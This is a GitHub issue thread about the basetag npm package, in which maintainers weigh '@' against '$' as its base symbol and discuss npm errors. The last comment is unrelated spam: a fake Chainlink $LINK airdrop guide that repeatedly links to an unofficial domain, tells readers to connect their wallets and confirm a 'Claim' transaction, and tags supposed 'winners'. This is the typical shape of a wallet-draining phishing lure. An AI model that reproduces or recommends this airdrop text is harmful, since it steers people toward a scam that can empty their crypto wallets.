### ISSUE TITLE
'@' instead of '$'

### ISSUE THREAD

**Issue by coolaj86** [janniks/basetag#15]
If there's ever a v2 of this, I'd recommend using `@` rather than `$`.

- `@` is commonly used to denote "home" or "start of"
- `@` is npm's existing convention for scoping packages
- `$` is commonly used to denote "end of"

**Comment by janniks** [comment]
Thanks for the feedback!

Fun fact: The package was called `at-base` previously and used the `@`. Unfortunately, node/npm treat it a bit differently and using the `@` would delete/move files in actual projects (very weird bug to figure out). But I guess this is somewhat related to the usage of `@name/package` in npm.

The `@` would have been my first choice too. I thiught about using the `§` but that's also strange.

**Comment by janniks** [comment]
Does the shell variable escaping give you any problems when using basetag?

**Comment by coolaj86** [comment]
> Does the shell variable escaping give you any problems when using basetag?

No, and yes. I did `ls node_modules/$` which, of course, didn't work. More user error than anything.

> @ would delete/move files in actual projects

Do you have any more details on that? I've submitted patches to `npm` before and I might look into it... someday.

**Comment by janniks** [comment]
Got it!

I've been thinking about a customizable basetag symbol for v2. Could be done via an optional `package.json` attribute or `.basetagrc` or similar. Users could use the default or customize to whatever.

Should be a super simple feature, I'll test it out over the next days and see if there's an issue with `@`...

**Comment by tuomassalo** [comment]
@coolaj86

> Do you have any more details on that? I've submitted patches to npm before and I might look into it... someday.

See https://gist.github.com/branneman/8048520#gistcomment-3009096 for some (scarce) details.

**Comment by janniks** [comment]
Good catch! Maybe this was the issue I though I was having with `@`.

I will do some investigating and think of a solution (maybe combined with #18 )

**Comment by coolaj86** [comment]
I ran into this today:

```txt
npm ERR! code EINVALIDPACKAGENAME
npm ERR! Invalid package name "$": name can only contain URL-friendly characters
```

**Comment by janniks** [comment]
Damn 😬

You can try to use `@` for a project (that you have backed up somewhere). Last time I tried, npm started deleting random folders in my local project. I think this is due to `@` being used in GitHub username handling e.g. import from `@janniks/basetag`. If you find `@` to word — great! But I'm not sure it will from a technical standpoint.

Otherwise, we might need to switch to `- . _ ~ ( ) ' ! * : , ;` — not great 🙃

**Comment by ikubij** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @orcsor, @Ozkabgundogan, @hirawatt, @viannaandreBR, @ilovelaseine, @aliirz1992, @Nookeemnstr
